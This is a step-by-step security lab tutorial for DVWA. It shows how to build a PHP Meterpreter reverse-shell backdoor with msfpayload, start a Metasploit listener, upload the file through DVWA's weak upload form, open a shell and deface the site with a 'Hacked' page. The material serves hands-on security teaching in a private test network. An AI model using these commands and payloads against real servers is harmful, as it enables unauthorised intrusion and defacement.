ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Damn Vulnerable Web App >> DVWA v1.0.7 >> Current Page |Views: 68702

(Damn Vulnerable Web App (DVWA): Lesson 8)

{ Upload PHP Backdoor Payload }

Section 0. Background Information
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

  • What is an Upload Attack Vector?
    • An Upload Attack Vector exists when a website application provides the ability to upload files.
    • Uploaded files represent a significant risk to applications.
    • The first step in many attacks is to get some code to the system to be attacked.
    • Then the attack only needs to find a way to get the code executed.
    • Using a file upload helps the attacker accomplish the first step.
    • The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

  • php/meterpreter/reverse_tcp payload
    • PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used open source general-purpose scripting language that is especially suited for web development and can be embedded into HTML.
    • Meterpreter, the short form of Meta - Interpreter, is an advanced multi - faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.
    • Many webservers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the filetype this can allow us to upload a php file including our payload, and then trick the server into executing it. Alternatively, this payload could be injected into a forum post or other like arenas.
    • The reverse_tcp Meterpreter payload will spawn a shell to the attacker's Meterpreter listening session.

  • Pre-Requisite Labs
  • Lab Notes
    • In this lab we will do the following:
      1. We will create a php/meterpreter/reverse_tcp payload
      2. We will start the php/meterpreter/reverse_tcp listener
      3. We will upload the PHP payload to the DVWA Upload screen
      4. We will use the PHP payload to establish a connection to the DVWA (Fedora14) machine.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

 

Section 2: Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine

     

  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

     

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

     

Section 4: Fix Upload Ownership and Permissions
  1. Fix Ownership and Permissions
    • Instructions:
      1. Bring up a Terminal Console on the DVWA (Fedora14) machine.
      2. chown root:apache /var/www/html/dvwa/hackable/uploads/
      3. chmod 775 /var/www/html/dvwa/hackable/uploads/
      4. ls -ld /var/www/html/dvwa/hackable/uploads/
    • Note(FYI):
      1. By default, the /var/www/html/dvwa/hackable/uploads/ directory is user and group owned by root.
      2. In addition, the apache user did not have "write" permission to allow a user to place a file in the hackable/uploads directory.

 

Section 5: Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 6: Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 7: Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

 

Section 8: Build PHP msfpayload
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Create msfpayload
    • Note(FYI):
      • Replace 192.168.1.105 with your BackTrack IP Address obtained from (Section 8, Step 2).
    • Instructions:
      1. mkdir -p /root/backdoor
      2. cd /root/backdoor
      3. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > PHONE_HOME.php
      4. ls -l PHONE_HOME.php

     

  3. Edit PHONE_HOME.php
    • Instructions:
      1. vi PHONE_HOME.php

     

  4. Remove the "#" character
    • Instructions:
      1. Press "x" to delete the "#" character on the first line.
      2. Press <Esc>
      3. Type ":wq!"

 

Section 9: Start PHP Payload Listener
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Start msfconsole
    • Instructions:
      1. msfconsole

     

  3. Start PHP Listener
    • Note(FYI):
      • Replace 192.168.1.105 with your BackTrack IP Address obtained from (Section 8, Step 2).
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD php/meterpreter/reverse_tcp
      3. set LHOST 192.168.1.105
      4. set LPORT 4444
      5. exploit
      6. Continue to Next Section

 

Section 10: Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox

     

  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

 

Section 11: Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit

     

Section 12: Upload PHP Payload
  1. Upload Menu
    • Instructions:
      1. Select "Upload" from the left navigation menu.
      2. Click Browse

     

  2. Navigate to PHONE_HOME.php
    • Instructions:
      1. Click on File System
      2. Click on root
      3. Click on backdoor
      4. Select Open

     

  3. Upload PHONE_HOME.php
    • Instructions:
      1. Click the Upload button

     

  4. Activate PHONE_HOME.php
    • Instructions:
      1. http://192.168.1.106/dvwa/hackable/uploads/
        • This is the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
      2. Click on PHONE_HOME.php
      3. Continue to next step

     

  5. Connection Established
    • Notes(FYI):
      1. Notice the stage was sent to the DVWA machine (Fedora14) along with the handy dandy meterpreter.
      2. Continue to next step.

     

  6. Establishing a Shell
    • Instructions:
      1. shell
        • Establishes a "sh" shell.
      2. uptime
        • How long has the server been up
      3. pwd
        • Current working directory
      4. whoami
        • Show who am I logged in as.
      5. w
        • Notice there is no entry for the user apache
      6. echo "Hacked at 4-23-2012, by Your Name" > hacked.html
        • Create some simple web graffiti
        • Replace 4-23-2012 with the present date.
        • Replace the string "Your Name" with your actual name.
      7. ls -l

 

Section 13: Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. On BackTrack, place the below URI in Firefox
        • http://192.168.1.106/dvwa/hackable/uploads/hacked.html
          • Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
    • Proof of Lab Instructions:
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle

 


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth